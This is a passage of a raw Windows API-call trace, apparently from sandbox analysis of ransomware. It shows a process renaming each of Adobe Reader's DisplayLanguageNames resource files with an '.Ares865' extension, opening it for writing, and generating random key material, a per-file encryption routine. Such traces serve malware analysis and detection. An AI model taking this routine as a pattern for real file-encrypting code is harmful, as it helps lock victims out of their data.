dwFlags=0x1) returned 1 [0159.446] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SY.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sy.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.446] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27798) returned 1 [0159.447] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.447] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.447] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.451] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.452] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.452] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.453] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_TN.txt" | out: lpString1="DisplayLanguageNames.ar_TN.txt") returned="DisplayLanguageNames.ar_TN.txt" [0159.453] lstrlenW (lpString="DisplayLanguageNames.ar_TN.txt") returned 30 [0159.453] lstrlenW (lpString="Ares865") returned 7 [0159.453] lstrcmpiW (lpString1="_TN.txt", lpString2="Ares865") returned -1 [0159.453] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_TN.txt.Ares865") returned 115 [0159.453] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_TN.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_tn.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_TN.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_tn.txt.ares865"), dwFlags=0x1) returned 1 [0159.456] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_TN.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_tn.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.456] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27798) returned 1 [0159.456] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.457] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.457] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.464] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.465] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.465] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.465] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_YE.txt" | out: lpString1="DisplayLanguageNames.ar_YE.txt") returned="DisplayLanguageNames.ar_YE.txt" [0159.465] lstrlenW (lpString="DisplayLanguageNames.ar_YE.txt") returned 30 [0159.466] lstrlenW (lpString="Ares865") returned 7 [0159.466] lstrcmpiW (lpString1="_YE.txt", lpString2="Ares865") returned -1 [0159.466] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_YE.txt.Ares865") returned 115 [0159.466] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_YE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ye.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_YE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ye.txt.ares865"), dwFlags=0x1) returned 1 [0159.468] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_YE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ye.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.468] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27798) returned 1 [0159.468] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.469] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.469] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.472] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.472] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.472] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.473] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.bg.txt" | out: lpString1="DisplayLanguageNames.bg.txt") returned="DisplayLanguageNames.bg.txt" [0159.473] lstrlenW (lpString="DisplayLanguageNames.bg.txt") returned 27 [0159.473] lstrlenW (lpString="Ares865") returned 7 [0159.473] lstrcmpiW (lpString1=".bg.txt", lpString2="Ares865") returned -1 [0159.473] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg.txt.Ares865") returned 112 [0159.474] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg.txt.ares865"), dwFlags=0x1) returned 1 [0159.476] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.476] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27870) returned 1 [0159.477] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.477] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.478] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.483] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.484] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.484] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.485] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.bg_BG.txt" | out: lpString1="DisplayLanguageNames.bg_BG.txt") returned="DisplayLanguageNames.bg_BG.txt" [0159.485] lstrlenW (lpString="DisplayLanguageNames.bg_BG.txt") returned 30 [0159.485] lstrlenW (lpString="Ares865") returned 7 [0159.485] lstrcmpiW (lpString1="_BG.txt", lpString2="Ares865") returned -1 [0159.485] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg_BG.txt.Ares865") returned 115 [0159.485] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg_BG.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg_bg.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg_BG.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg_bg.txt.ares865"), dwFlags=0x1) returned 1 [0159.487] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg_BG.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg_bg.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.487] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27870) returned 1 [0159.487] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.488] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.488] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.494] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.494] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.494] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.495] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ca.txt" | out: lpString1="DisplayLanguageNames.ca.txt") returned="DisplayLanguageNames.ca.txt" [0159.495] lstrlenW (lpString="DisplayLanguageNames.ca.txt") returned 27 [0159.495] lstrlenW (lpString="Ares865") returned 7 [0159.495] lstrcmpiW (lpString1=".ca.txt", lpString2="Ares865") returned -1 [0159.496] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca.txt.Ares865") returned 112 [0159.496] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca.txt.ares865"), dwFlags=0x1) returned 1 [0159.497] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.498] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27868) returned 1 [0159.498] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.499] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.499] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.502] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.503] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.503] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.503] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ca_ES.txt" | out: lpString1="DisplayLanguageNames.ca_ES.txt") returned="DisplayLanguageNames.ca_ES.txt" [0159.503] lstrlenW (lpString="DisplayLanguageNames.ca_ES.txt") returned 30 [0159.503] lstrlenW (lpString="Ares865") returned 7 [0159.503] lstrcmpiW (lpString1="_ES.txt", lpString2="Ares865") returned -1 [0159.504] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES.txt.Ares865") returned 115 [0159.504] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es.txt.ares865"), dwFlags=0x1) returned 1 [0159.506] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.506] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27868) returned 1 [0159.506] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.507] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.507] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.511] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.511] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.512] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.512] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ca_ES_PREEURO.txt" | out: lpString1="DisplayLanguageNames.ca_ES_PREEURO.txt") returned="DisplayLanguageNames.ca_ES_PREEURO.txt" [0159.512] lstrlenW (lpString="DisplayLanguageNames.ca_ES_PREEURO.txt") returned 38 [0159.512] lstrlenW (lpString="Ares865") returned 7 [0159.512] lstrcmpiW (lpString1="URO.txt", lpString2="Ares865") returned 1 [0159.513] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES_PREEURO.txt.Ares865") returned 123 [0159.513] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es_preeuro.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es_preeuro.txt.ares865"), dwFlags=0x1) returned 1 [0159.515] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es_preeuro.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.515] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27868) returned 1 [0159.515] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.516] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.516] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.530] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.531] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.531] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.532] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.cs.txt" | out: lpString1="DisplayLanguageNames.cs.txt") returned="DisplayLanguageNames.cs.txt" [0159.532] lstrlenW (lpString="DisplayLanguageNames.cs.txt") returned 27 [0159.532] lstrlenW (lpString="Ares865") returned 7 [0159.532] lstrcmpiW (lpString1=".cs.txt", lpString2="Ares865") returned -1 [0159.532] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs.txt.Ares865") returned 112 [0159.532] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs.txt.ares865"), dwFlags=0x1) returned 1 [0159.534] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.535] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29888) returned 1 [0159.535] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.536] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.536] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.540] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.540] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.540] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.541] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.cs_CZ.txt" | out: lpString1="DisplayLanguageNames.cs_CZ.txt") returned="DisplayLanguageNames.cs_CZ.txt" [0159.541] lstrlenW (lpString="DisplayLanguageNames.cs_CZ.txt") returned 30 [0159.541] lstrlenW (lpString="Ares865") returned 7 [0159.541] lstrcmpiW (lpString1="_CZ.txt", lpString2="Ares865") returned -1 [0159.542] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs_CZ.txt.Ares865") returned 115 [0159.542] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs_CZ.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs_cz.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs_CZ.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs_cz.txt.ares865"), dwFlags=0x1) returned 1 [0159.544] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs_CZ.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs_cz.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.544] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29888) returned 1 [0159.544] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.545] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.545] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.550] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.551] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.551] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.552] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.da.txt" | out: lpString1="DisplayLanguageNames.da.txt") returned="DisplayLanguageNames.da.txt" [0159.552] lstrlenW (lpString="DisplayLanguageNames.da.txt") returned 27 [0159.552] lstrlenW (lpString="Ares865") returned 7 [0159.552] lstrcmpiW (lpString1=".da.txt", lpString2="Ares865") returned -1 [0159.552] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da.txt.Ares865") returned 112 [0159.552] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da.txt.ares865"), dwFlags=0x1) returned 1 [0159.554] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.554] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28018) returned 1 [0159.555] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.555] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.555] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.565] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.565] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.565] CryptReleaseContext (hProv=0x2f0518, 